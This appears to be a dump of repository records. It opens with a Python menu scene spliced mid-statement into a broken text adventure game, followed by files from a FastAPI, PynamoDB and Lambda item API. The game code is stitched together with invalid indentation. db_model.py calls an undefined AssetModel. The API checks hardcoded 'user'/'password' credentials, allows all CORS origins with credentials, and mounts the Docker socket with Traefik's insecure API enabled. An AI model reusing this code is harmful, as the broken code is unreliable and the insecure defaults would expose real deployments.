shadow=shadow, parent=self)\n\t\tself.title_label = LabelNode(self.title, font=title_font, color='black', position=(0, self.menu_bg.size.h/2 - 40), parent=self.menu_bg)\n\t\tself.title_label.anchor_point = (0.5, 1)\n\t\tself.subtitle_label = LabelNode(self.subtitle, font=button_font, position=(0, self.menu_bg.size.h/2 - 100), color='black', parent=self.menu_bg)\n\t\tself.subtitle_label.anchor_point = (0.5, 1)\n\t\tself.buttons = []\n\t\tfor i, title in enumerate(reversed(self.button_titles)):\n\t\t\tbtn = ButtonNode(title, parent=self.menu_bg)\n\t\t\tbtn.position = 0, i * 64 - (num_buttons-1) * 32 - 50\n\t\t\tself.buttons.append(btn)\n\t\tself.did_change_size()\n\t\tself.menu_bg.scale = 0\n\t\tself.bg.alpha = 0\n\t\tself.bg.run_action(A.fade_to(0.4))\n\t\tself.menu_bg.run_action(A.scale_to(1, 0.3, TIMING_EASE_OUT_2))\n\t\tself.background_color = 'red'\n\t\t\n\tdef did_change_size(self):\n\t\tself.bg.size = self.size + (2, 2)\n\t\tself.bg.position = self.size/2\n\t\tself.menu_bg.position = self.size/2\n\t\n\tdef touch_began(self, touch):\n\t\ttouch_loc = self.menu_bg.point_from_scene(touch.location)\n\t\tfor btn in self.buttons:\n\t\t\tif touch_loc in btn.frame:\n\t\t\t\tsound.play_effect('8ve:8ve-tap-resonant')\n\t\t\t\tbtn.texture = Texture('pzl:Button2')\n\t\n\tdef touch_ended(self, touch):\n\t\ttouch_loc = self.menu_bg.point_from_scene(touch.location)\n\t\tfor btn in self.buttons:\n\t\t\tbtn.texture = Texture('pzl:Button1')\n\t\t\tif self.presenting_scene and touch_loc in btn.frame:\n\t\t\t\tnew_title = self.presenting_scene.menu_button_selected(btn.SJK)\n\t\t\t\tif new_title:from time import sleep\n\n\n\t\t\tbtn.texture = Texture('pzl:Button1')\n\t\t\tif self.presenting_scene and touch_loc in btn.frame:\n\t\t\t\tnew_title = self.presenting_scene.menu_button_selected(btn.SJK)\n\t\t\t\tif new_title:\n\t\t\t\t\tbtn.title = new_title\n\t\t\t\t\tbtn.title_label.text = new_title\n\nif __name__ == '__main__':\n\trun(MenuScene('SJK', 'Our game', ['Start']))\nwhile True:\n\tdirections=[\"west\", \"north\", \"south\", \"east\"]\n\tchoice=input(\"what direction do you want to go \") \n if choice==\"west\":\n print(\" __ \")\n print(\" __ _ __ ____ _______/ |_ \")\n print(\"\\ \\/ \\/ // __ \\ / ___/\\ __\\ \")\n print(\" \\ /\\ ___/ \\___ \\ | | \")\n print(\" \\/\\_/ \\___ >____ > |__| \")\n print(\" \\/ \\/ \")\n sleep(2)\n print(directions)\n print(\"too bad you lost, you fell off a clif \")\n elif choice==\"north\":\n print(\" ____ ____________/ |_| |__ \")\n print(\" / \\ / _ \\_ __ \\ __\\ | \\ 
\")\n print(\"| | ( <_> ) | \\/| | | Y \\ \")\n print(\"|___| /\\____/|__| |__| |___| /\")\n print(\" \\/ \\/ \")\n sleep(2)\n print(directions)\n print(\"haha, you lost, dead end \")\n elif choice==\"south\":\n print(\" __ __ \")\n print(\" __________ __ ___/ |_| |__ \")\n print(\" / ___/ _ \\| | \\ __\\ | \\ \")\n print(\" \\___ ( <_> ) | /| | | Y \\ \")\n print(\"/____ >____/|____/ |__| |___| / \")\n print(\" \\/ \\/ \") \n sleep(2)\n print(directions)\n print(\"no you lost, you got ran over\")\n elif choice==\"east\":\n print(\" __ \")\n print(\" ____ _____ _______/ |_ \")\n print(\"_/ __ \\\\__ \\ / ___/\\ __\\ \")\n print(\"\\ ___/ / __ \\_\\___ \\ | | \")\n print(\" \\___ >____ /____ > |__| \")\n print(\" \\/ \\/ \\/ \")\n sleep(2)\n print(directions)\n print(\"well done, you won you get 200 million\")\n\tbreak\n else:\n print(\"not a direction you can go\")\nwhile True:\n\tprint(\"welcome to level 2\")\n\tdoors=[\"doors 1\", \"door 2\", \"door 3\", \"door 4\"]\n\tchoice=input(\"what door do you want to go through be wise pick the wrong one you will DIE!! \") \n if choice==\"door 1\":\n sleep(2)\n print(directions)\n print(\"well done, you played youreself, you ran into a killer\")\n elif choice==\"door 2\":\n sleep(2)\n print(directions)\n print(\"haha, you lost, try again dumbie\")\n elif choice==\"door 3\":\n sleep(2)\n print(directions)\n print(\"well done, you won you get 200 million\")\n\tbreak\n elif choice==\"door 4\":\n sleep(2)\n print(directions)\n print(\"lol you need jesus to help you\")\n else:\n print(\"not a direction you can go\")\n"
}
] | 1 |
k8k/HBHTML
|
https://github.com/k8k/HBHTML
|
647aa79e5b0590b33093c7680d3686c6468bf61a
|
7bb0016b458016290b3ae69d7a992fd5f683e605
|
583cd8cf9ec80de0bdc6bf85d64803cd29b23986
|
refs/heads/master
| 2021-01-01T06:49:50.621019 | 2014-10-15T22:55:08 | 2014-10-15T22:55:08 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5870901346206665,
"alphanum_fraction": 0.6475409865379333,
"avg_line_length": 17.092592239379883,
"blob_id": "b960e40406b5956fc23bd66ee0f53d642e572748",
"content_id": "d924294d47cc60e9625cb77d8e23c192b9587b17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 976,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 54,
"path": "/run_trial.py",
"repo_name": "k8k/HBHTML",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\[email protected](\"/001\")\ndef trial1():\n return render_template(\"trial1.html\")\n\[email protected](\"/002\")\ndef trial2():\n return render_template(\"trial2.html\")\n\[email protected](\"/003\")\ndef trial3():\n return render_template(\"trial3.html\")\n\[email protected](\"/004\")\ndef trial4():\n return render_template(\"trial4.html\")\n\[email protected](\"/005\")\ndef trial5():\n return render_template(\"trial5.html\")\n\[email protected](\"/006\")\ndef trial6():\n return render_template(\"trial6.html\") \n\[email protected](\"/007\")\ndef trial7():\n return render_template(\"trial7.html\") \n\[email protected](\"/008\")\ndef trial8():\n return render_template(\"trial8.html\")\n\n\[email protected](\"/009\")\ndef trial9():\n return render_template(\"trial9.html\")\n\[email protected](\"/010\")\ndef trial10():\n return render_template(\"trial10.html\")\n\[email protected](\"/011\")\ndef trial11():\n return render_template(\"trial11.html\")\n\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)"
}
] | 1 |
benlau6/fastapi-pynamodb-lambda-versioning
|
https://github.com/benlau6/fastapi-pynamodb-lambda-versioning
|
194fa94a58ff1164e19d8f53234968fc62030e25
|
8ae8801c9b92137340c837cd5696d40fe0b014c8
|
4fe73625fc541f9839ca590a82329d8ab6a32ef7
|
refs/heads/main
| 2023-07-10T17:54:41.403574 | 2021-08-13T04:03:08 | 2021-08-13T04:03:08 | 360,108,665 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7204819321632385,
"alphanum_fraction": 0.7240963578224182,
"avg_line_length": 35.08695602416992,
"blob_id": "d551320d322e1602f4f81d3aa98d703c08d28ed8",
"content_id": "f68ae43e6f6a255e6897c8e6e21b3b650797c389",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 830,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 23,
"path": "/app/api/v1/endpoints/login.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from fastapi import APIRouter, Depends, HTTPException, status\nfrom fastapi.security import HTTPBasic, HTTPBasicCredentials\nimport secrets\n\nrouter = APIRouter()\n\nsecurity = HTTPBasic()\n\ndef get_current_username(credentials: HTTPBasicCredentials = Depends(security)):\n correct_username = secrets.compare_digest(credentials.username, \"user\")\n correct_password = secrets.compare_digest(credentials.password, \"password\")\n if not (correct_username and correct_password):\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Incorrect username or password\",\n headers={\"WWW-Authenticate\": \"Basic\"},\n )\n return credentials.username\n\n\[email protected](\"/me\")\ndef read_current_user(username: str = Depends(get_current_username)):\n return {\"username\": username}\n"
},
{
"alpha_fraction": 0.7351351380348206,
"alphanum_fraction": 0.745945930480957,
"avg_line_length": 21.375,
"blob_id": "1c3b5ead9d0564b7e30a2b378530992804035601",
"content_id": "40ba396a238c6f3baa3a96f14a307a49bf29dfb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 185,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 8,
"path": "/Dockerfile",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "FROM tiangolo/uvicorn-gunicorn-fastapi:python3.8\r\n\r\nCOPY ./requirements.txt requirements.txt\r\n\r\nRUN pip install -r requirements.txt \r\n\r\nCOPY ./log_cfg.py log_cfg.py\r\nCOPY ./app /app/app"
},
{
"alpha_fraction": 0.7027431130409241,
"alphanum_fraction": 0.7187032699584961,
"avg_line_length": 25.12162208557129,
"blob_id": "7e907a10fc3d021c013d6e33c9542a8204c5a749",
"content_id": "e365bb180bf6e24c07c2ea30654f2091255c87f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2005,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 74,
"path": "/README.md",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "### This repository has a complexer app folder structure for bigger application and easier management.\r\n\r\n# Serverless REST API\r\nThis demonstrates how to setup a [RESTful Web Service](https://en.wikipedia.org/wiki/Representational_state_transfer#Applied_to_web_services) \r\n\r\n### API GW Integration model\r\nAll methods use `lambda-proxy` integration as that reduces the API GW interference in the payload.\r\n### Logging\r\nThe log_cfg.py is an alternate way to setup the python logging to be more friendly wth AWS lambda.\r\nThe lambda default logging config is to not print any source file or line number which makes it harder to correleate with the source.\r\n\r\nAdding the import:\r\n```python\r\n from log_cfg import logger\r\n```\r\nat the start of every event handler ensures that the format of the log messages are consistent, customizable and all in one place. \r\n\r\nDefault format uses:\r\n```python\r\n'%(asctime)-15s %(process)d-%(thread)d %(name)s [%(filename)s:%(lineno)d] :%(levelname)8s: %(message)s'\r\n```\r\n\r\n## Setup\r\n\r\nDownload node.js LTS version from https://nodejs.org/en/ \\\r\nInstall node.js and restart terminal if it is opened \\\r\nThen run commands below:\r\n\r\n```bash\r\nnpm install -g serverless\r\n\r\ngit clone https://github.com/benlau6/fastapi-pynamodb-lambda-version.git\r\ncd ./fastapi-pynamodb-lambda-version\r\n\r\nnpm install\r\n```\r\n\r\n## Deploy\r\n\r\nIn order to deploy the endpoint simply run\r\n\r\n```bash\r\nsls deploy\r\n```\r\n\r\n### Function update\r\n\r\nIn order to update the function run\r\n\r\n```bash\r\nsls deploy -f $function\r\n```\r\n\r\n### Function local test\r\n\r\nIn order to test the function locally, create a event.json in examples folder, then run\r\n\r\n```bash\r\naws invoke -f $function -p examples/event.json\r\n```\r\n\r\n## Docker\r\n\r\nIn order to run it locally, run the script below:\r\n\r\n```bash\r\ndocker-compose up\r\n```\r\n\r\nThen go to \r\n1. 127.0.0.1/dev to see if the endpoint is accessible\r\n2. 127.0.0.1/dev/docs to see api documentation\r\n3. 127.0.0.1/dev/items to query dynamoDB\r\n4. 127.0.0.1/dev/graphql to explore graphql"
},
{
"alpha_fraction": 0.8235294222831726,
"alphanum_fraction": 0.8235294222831726,
"avg_line_length": 68,
"blob_id": "da54b85170a118014071b4816ec40836993d4372",
"content_id": "3e2ddd573cf68555fdbbc4d7c013ffb7c7ac1e32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 68,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 1,
"path": "/app/schemas/__init__.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from .item import ItemIn, ItemOut, ItemOutAntd, ItemSort, ItemUpdate"
},
{
"alpha_fraction": 0.6218527555465698,
"alphanum_fraction": 0.6223278045654297,
"avg_line_length": 23.987653732299805,
"blob_id": "1bb01c027cdf03276e44546731d95851e21b0250",
"content_id": "bcd6a943505e802d6ce9fded96b19f0cc64d10bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2105,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 81,
"path": "/app/routers/items.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "import http.client as httplib\r\nimport uuid\r\nfrom typing import List, Optional\r\n\r\nfrom fastapi import APIRouter\r\nfrom pydantic import BaseModel\r\nfrom pynamodb.exceptions import DeleteError, DoesNotExist\r\n\r\nfrom .db_model import ItemModel\r\nfrom .utils import get_updated_at\r\n\r\nrouter = APIRouter(\r\n prefix=\"/items\",\r\n tags=[\"items\"]\r\n)\r\n\r\n\r\nclass ItemBase(BaseModel):\r\n name: str\r\n image: str\r\n status: str\r\n created_at: str\r\n updated_at: str\r\n\r\nclass ItemIn(ItemBase):\r\n item_id: str = uuid.uuid4()\r\n\r\nclass ItemOut(ItemBase):\r\n item_id: str\r\n\r\nclass ItemOutAntd(BaseModel):\r\n data: List[ItemOut]\r\n\r\nclass ItemUpdate(BaseModel):\r\n status: str\r\n\r\nclass ItemSort(BaseModel):\r\n updated_at: str\r\n\r\n\r\[email protected](\"/{item_id}\", response_model=ItemOut)\r\ndef read_item(item_id: str, q: Optional[str] = None):\r\n item = ItemModel.get(item_id)\r\n return dict(item)\r\n\r\n\r\[email protected](\"/{item_id}\", response_model=ItemOut)\r\ndef update_item(item_id: str, new_item:ItemUpdate):\r\n item = ItemModel.get(item_id)\r\n item.update(\r\n actions=[\r\n ItemModel.status.set(new_item.status),\r\n ItemModel.updated_at.set(get_updated_at())\r\n ]\r\n )\r\n return dict(item)\r\n\r\n\r\[email protected](\"/\", response_model=ItemOutAntd)\r\ndef read_items(created_at: Optional[str] = None, updated_at: Optional[str] = None):\r\n items = ItemModel.scan()\r\n items = [dict(item) for item in items]\r\n \r\n if updated_at:\r\n if updated_at == 'ascend':\r\n items = sorted(items, key=lambda k: k['updated_at'])\r\n elif updated_at == 'descend':\r\n items = sorted(items, key=lambda k: k['updated_at'], reverse=True)\r\n elif created_at:\r\n if created_at == 'ascend':\r\n items = sorted(items, key=lambda k: k['created_at'])\r\n elif created_at == 'descend':\r\n items = sorted(items, key=lambda k: k['created_at'], reverse=True)\r\n\r\n return {'data': items}\r\n #return {'data': [dict(item) for item in items]}\r\n\r\n\r\[email protected](\"/\", response_model=ItemOut)\r\ndef insert_item(item: ItemIn):\r\n return item\r\n"
},
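The `default_factory` on `ItemIn.item_id` in the file above is load-bearing: a plain `uuid.uuid4()` class default would be evaluated once at import time, so every instance created without an explicit id would share the same value (and as a `UUID`, not a `str`). A quick stand-alone demonstration (pydantic v1-style API; the model name is invented for illustration):

```python
import uuid
from pydantic import BaseModel, Field

class WithFactory(BaseModel):  # illustrative model, not part of the app
    item_id: str = Field(default_factory=lambda: str(uuid.uuid4()))

a, b = WithFactory(), WithFactory()
assert a.item_id != b.item_id  # each instance gets its own id
```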
{
"alpha_fraction": 0.6993166208267212,
"alphanum_fraction": 0.7015945315361023,
"avg_line_length": 15.923076629638672,
"blob_id": "482cab4585fcfbc4fea9d8187ef08473d8c0c81d",
"content_id": "9371af2ad4b64d52898e45a95dd53dc2bf7b26e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 439,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 26,
"path": "/app/schemas/item.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "import uuid\nfrom typing import List, Optional\n\nfrom pydantic import BaseModel\n\nclass ItemBase(BaseModel):\n name: str\n image: str\n status: str\n created_at: str\n updated_at: str\n\nclass ItemIn(ItemBase):\n item_id: str = uuid.uuid4()\n\nclass ItemOut(ItemBase):\n item_id: str\n\nclass ItemOutAntd(BaseModel):\n data: List[ItemOut]\n\nclass ItemUpdate(BaseModel):\n status: str\n\nclass ItemSort(BaseModel):\n updated_at: str"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 70,
"blob_id": "5fcaa0e8c92cb973d9c48863402ad1b609c54f2f",
"content_id": "6a11af033b002463deb2e46fc606a0b7ebced134",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 1,
"path": "/examples/load_data.sh",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "aws dynamodb batch-write-item --request-items file://initial_data.json"
},
{
"alpha_fraction": 0.6469104886054993,
"alphanum_fraction": 0.6469104886054993,
"avg_line_length": 28.370370864868164,
"blob_id": "413e3a1eb085be8b6edb64d089a92352c2d3adf7",
"content_id": "6567b83b9ae7a1b6e497f407722c2bec4c7e8d0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1586,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 54,
"path": "/app/api/v1/endpoints/items.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "import http.client as httplib\nimport uuid\nfrom typing import List, Optional\n\nfrom fastapi import APIRouter\nfrom pynamodb.exceptions import DeleteError, DoesNotExist\n\nfrom app import crud, schemas\nfrom app.utils import get_updated_at\n\n\n\nrouter = APIRouter()\n\[email protected](\"/{item_id}\", response_model=schemas.ItemOut)\ndef read_item(item_id: str, q: Optional[str] = None):\n item = crud.item.get(item_id)\n return dict(item)\n\n\[email protected](\"/{item_id}\", response_model=schemas.ItemOut)\ndef update_item(item_id: str, new_item:schemas.ItemUpdate):\n item = crud.item.get(item_id)\n item.update(\n actions=[\n crud.item.status.set(new_item.status),\n crud.item.updated_at.set(get_updated_at())\n ]\n )\n return dict(item)\n\n\[email protected](\"/\", response_model=schemas.ItemOutAntd)\ndef read_items(created_at: Optional[str] = None, updated_at: Optional[str] = None):\n items = crud.item.scan()\n items = [dict(item) for item in items]\n \n if updated_at:\n if updated_at == 'ascend':\n items = sorted(items, key=lambda k: k['updated_at'])\n elif updated_at == 'descend':\n items = sorted(items, key=lambda k: k['updated_at'], reverse=True)\n elif created_at:\n if created_at == 'ascend':\n items = sorted(items, key=lambda k: k['created_at'])\n elif created_at == 'descend':\n items = sorted(items, key=lambda k: k['created_at'], reverse=True)\n\n return {'data': items}\n\n\[email protected](\"/\", response_model=schemas.ItemOut)\ndef insert_item(item: schemas.ItemIn):\n return item\n"
},
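The ascend/descend branches in `read_items` above rely on the fact that `'%Y-%m-%d %H:%M:%S'` timestamps sort chronologically as plain strings, so no datetime parsing is needed. A tiny stand-alone illustration (sample rows invented):

```python
items = [
    {"item_id": "a", "updated_at": "2021-01-02 10:00:00"},
    {"item_id": "b", "updated_at": "2021-01-01 09:00:00"},
]
descending = sorted(items, key=lambda k: k["updated_at"], reverse=True)
assert [row["item_id"] for row in descending] == ["a", "b"]
```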
{
"alpha_fraction": 0.7857142686843872,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 6.800000190734863,
"blob_id": "536fa2fa12d55f8cc0f1e3beadd220ee08bc1f5b",
"content_id": "3ef31d3ede9fe6379abe32de4784db4b5abef0f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 42,
"license_type": "no_license",
"max_line_length": 8,
"num_lines": 5,
"path": "/requirements.txt",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "pynamodb\r\nfastapi\r\nmangum\r\ngraphene\r\nboto3"
},
{
"alpha_fraction": 0.8148148059844971,
"alphanum_fraction": 0.8148148059844971,
"avg_line_length": 27,
"blob_id": "b981289efc4b41d505cf84d993b470e34031d5c3",
"content_id": "9fd35e8ed8a4941bfab3a37ce4239c6449fc8d75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/app/crud/__init__.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from .crud_item import item"
},
{
"alpha_fraction": 0.5992890000343323,
"alphanum_fraction": 0.6277298331260681,
"avg_line_length": 33.83636474609375,
"blob_id": "e3bc5eb058eeba46f6a14068b5387f495f169574",
"content_id": "942a5b159cddc8b2b71b404be1b82acb1dc44fd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 1969,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 55,
"path": "/docker-compose.yml",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "version: '3.8'\r\nservices:\r\n api:\r\n build: .\r\n # for direct entry: 127.0.0.1:3000\r\n ports:\r\n - 3000:3000\r\n env_file:\r\n - .env\r\n environment: \r\n # check for env: https://github.com/tiangolo/uvicorn-gunicorn-fastapi-docker\r\n - PORT=3000\r\n - LOG_LEVEL=debug\r\n labels:\r\n # Enable Traefik for this specific \"backend\" service\r\n - traefik.enable=true\r\n # Define the port inside of the Docker service to use (shd be same as env:PORT)\r\n - traefik.http.services.app.loadbalancer.server.port=3000\r\n # Make Traefik use this domain in HTTP\r\n - traefik.http.routers.app-http.entrypoints=http\r\n - traefik.http.routers.app-http.rule=Host(`127.0.0.1`) && PathPrefix(`/dev`)\r\n - traefik.http.middlewares.api-strip-prefix.stripprefix.prefixes=/dev\r\n - traefik.http.routers.app-http.middlewares=api-strip-prefix@docker\r\n reverse-proxy:\r\n image: traefik\r\n ports:\r\n # Listen on port 80, default for HTTP, necessary to redirect to HTTPS\r\n - 80:80\r\n - 8080:8080\r\n volumes:\r\n # Add Docker as a mounted volume, so that Traefik can read the labels of other services\r\n - \"/var/run/docker.sock:/var/run/docker.sock:ro\"\r\n command:\r\n # Enable Docker in Traefik, so that it reads labels from Docker services\r\n - --providers.docker\r\n # Do not expose all Docker services, only the ones explicitly exposed\r\n - --providers.docker.exposedbydefault=false\r\n # Create an entrypoint \"http\" listening on port 80\r\n - --entrypoints.http.address=:80\r\n # Enable the access log, with HTTP requests\r\n - --accesslog\r\n # Enable the Traefik log, for configurations and errors\r\n - --log\r\n # Enable the Dashboard and API\r\n #- --api\r\n - --api.insecure=true\r\n\r\n #nginx:\r\n # image: nginx:alpine\r\n # ports:\r\n # - 80:80\r\n # volumes:\r\n # - ./nginx/default.conf:/etc/nginx/conf.d/default.conf\r\n # depends_on:\r\n # - api"
},
{
"alpha_fraction": 0.6755994558334351,
"alphanum_fraction": 0.6812412142753601,
"avg_line_length": 21.700000762939453,
"blob_id": "b46afc74aba9cee5568eb22569f6208cb776cf45",
"content_id": "830badd66dc27a63e0cd9315f0c869c397fd4a93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 709,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 30,
"path": "/app/main.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from fastapi import FastAPI\r\nfrom fastapi.middleware.cors import CORSMiddleware\r\nfrom mangum import Mangum\r\n\r\nfrom .api.v1.api import router as api_v1_router\r\nfrom .api.graphql.api import router as gql_router\r\nfrom app.core.config import settings\r\n\r\nimport os\r\n\r\nSTAGE = os.environ['STAGE']\r\n\r\napp = FastAPI(root_path=f'/{STAGE}')\r\n\r\napp.add_middleware(\r\n CORSMiddleware,\r\n allow_origins=[\"*\"],\r\n allow_credentials=True,\r\n allow_methods=[\"*\"],\r\n allow_headers=[\"*\"],\r\n)\r\n\r\napp.include_router(api_v1_router, prefix=settings.API_V1_STR)\r\napp.include_router(gql_router, prefix='/graphql', tags=['graphql'])\r\n\r\[email protected](\"/\")\r\ndef read_root():\r\n return {\"Hello\": \"World\"}\r\n\r\nhandler = Mangum(app)"
},
{
"alpha_fraction": 0.6399317383766174,
"alphanum_fraction": 0.6433447003364563,
"avg_line_length": 35.446807861328125,
"blob_id": "341ad12b1695f8c3b81740296bdfdc4de70cb3fc",
"content_id": "0c15c79afd9b51c344378003b339357687c0785c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1758,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 47,
"path": "/app/routers/db_model.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\r\nfrom datetime import timedelta\r\nfrom enum import Enum\r\nimport boto3\r\nimport json\r\nimport os\r\nfrom pynamodb.attributes import UnicodeAttribute, UTCDateTimeAttribute, ListAttribute\r\nfrom pynamodb.models import Model\r\nfrom log_cfg import logger\r\n\r\nclass State(Enum):\r\n \"\"\"\r\n Manage asset states in dynamo with a string field\r\n Could have used an int as well, or used a custom serializer which is a bit cleaner.\r\n \"\"\"\r\n undetermined = 1\r\n normal = 2\r\n fault = 3\r\n\r\nclass ItemModel(Model):\r\n class Meta:\r\n table_name = os.environ['DYNAMODB_TABLE']\r\n region = os.environ['REGION']\r\n billing_mode = 'PAY_PER_REQUEST'\r\n\r\n item_id = UnicodeAttribute(hash_key=True)\r\n name = UnicodeAttribute(null=False)\r\n image = UnicodeAttribute(null=False)\r\n status = UnicodeAttribute(null=False, default=State.undetermined.name)\r\n created_at = UnicodeAttribute(null=False, default=(datetime.now()+timedelta(hours=8)).strftime('%Y-%m-%d %H:%M:%S'))\r\n updated_at = UnicodeAttribute(null=False, default=(datetime.now()+timedelta(hours=8)).strftime('%Y-%m-%d %H:%M:%S'))\r\n\r\n def __str__(self):\r\n return 'item_id:{}, name:{}'.format(self.item_id, self.name)\r\n\r\n def __iter__(self):\r\n for name, attr in self._get_attributes().items():\r\n yield name, attr.serialize(getattr(self, name))\r\n\r\n def save(self, conditional_operator=None, **expected_values):\r\n try:\r\n self.update_at = datetime.now().astimezone()\r\n logger.debug('saving: {}'.format(self))\r\n super(AssetModel, self).save()\r\n except Exception as e:\r\n logger.error('save {} failed: {}'.format(self.item_id, e), exc_info=True)\r\n raise e"
},
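The callable default (`_now_string`) on `created_at`/`updated_at` above matters in a Lambda container: a pre-computed string default is evaluated once per process, so a warm container would stamp every new item with its start-up time. A dependency-free sketch of the difference:

```python
from datetime import datetime, timedelta

FMT = '%Y-%m-%d %H:%M:%S'
frozen = (datetime.now() + timedelta(hours=8)).strftime(FMT)         # computed once, never changes
fresh = lambda: (datetime.now() + timedelta(hours=8)).strftime(FMT)  # re-reads the clock per call

print(frozen, fresh())
```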
{
"alpha_fraction": 0.7430939078330994,
"alphanum_fraction": 0.7430939078330994,
"avg_line_length": 44.375,
"blob_id": "3a040c3ace52f8be50e983fac8c3a80ab2efdf83",
"content_id": "a4fdbf7705108ae3974e4587ab2d87197d8b9304",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 8,
"path": "/app/api/v1/api.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from fastapi import APIRouter\nfrom .endpoints import login, users, utils, items\n\nrouter = APIRouter()\n#router.include_router(login.router, tags=['login'])\nrouter.include_router(users.router, prefix='/users', tags=['users'])\n#router.include_router(utils.router, prefix='/utils', tags=['utils'])\nrouter.include_router(items.router, prefix='/items', tags=['items'])"
},
{
"alpha_fraction": 0.7037037014961243,
"alphanum_fraction": 0.7089946866035461,
"avg_line_length": 26.14285659790039,
"blob_id": "9d5db9bed23c9667cafd00ca0c1cabcd90ce8ccd",
"content_id": "5a33cf82301d31911b541658fd58255a543f50a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 189,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 7,
"path": "/app/utils.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from datetime import datetime, timedelta\nimport time\n\ndatetime_format = '%Y-%m-%d %H:%M:%S'\n\ndef get_updated_at():\n return (datetime.now() + timedelta(hours=8)).strftime(datetime_format)"
}
] | 15 |
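`get_updated_at` above hard-codes a UTC+8 offset (Lambda clocks run in UTC; the +8 presumably targets the deployment's local time). If that reading is right, a timezone-aware variant avoids the magic number — a sketch assuming Python 3.9+ and that Asia/Hong_Kong is the intended zone:

```python
from datetime import datetime
from zoneinfo import ZoneInfo  # standard library since Python 3.9

def get_updated_at():
    # same '%Y-%m-%d %H:%M:%S' format, offset handled by the tz database
    return datetime.now(ZoneInfo("Asia/Hong_Kong")).strftime('%Y-%m-%d %H:%M:%S')
```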
BijoySingh/Project-Hermes-Django | https://github.com/BijoySingh/Project-Hermes-Django | 7adaf6757bc605e9f3781d915c4250bcc348fb47 | 7cb50402e612ea287d5922a2716a30b7888a0d70 | 8a1cc9342312f794c48a857de1444a70491a75fa | refs/heads/master | 2016-09-01T07:04:05.259487 | 2016-04-09T10:25:21 | 2016-04-09T10:25:21 | 55,672,434 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7377049326896667,
"alphanum_fraction": 0.7868852615356445,
"avg_line_length": 29.5,
"blob_id": "41ff5735a6c02489b861a8d4b6fe7a6b1f918554",
"content_id": "90085b5c4148565b6cd26f90ef4922fd464a7e75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 61,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 2,
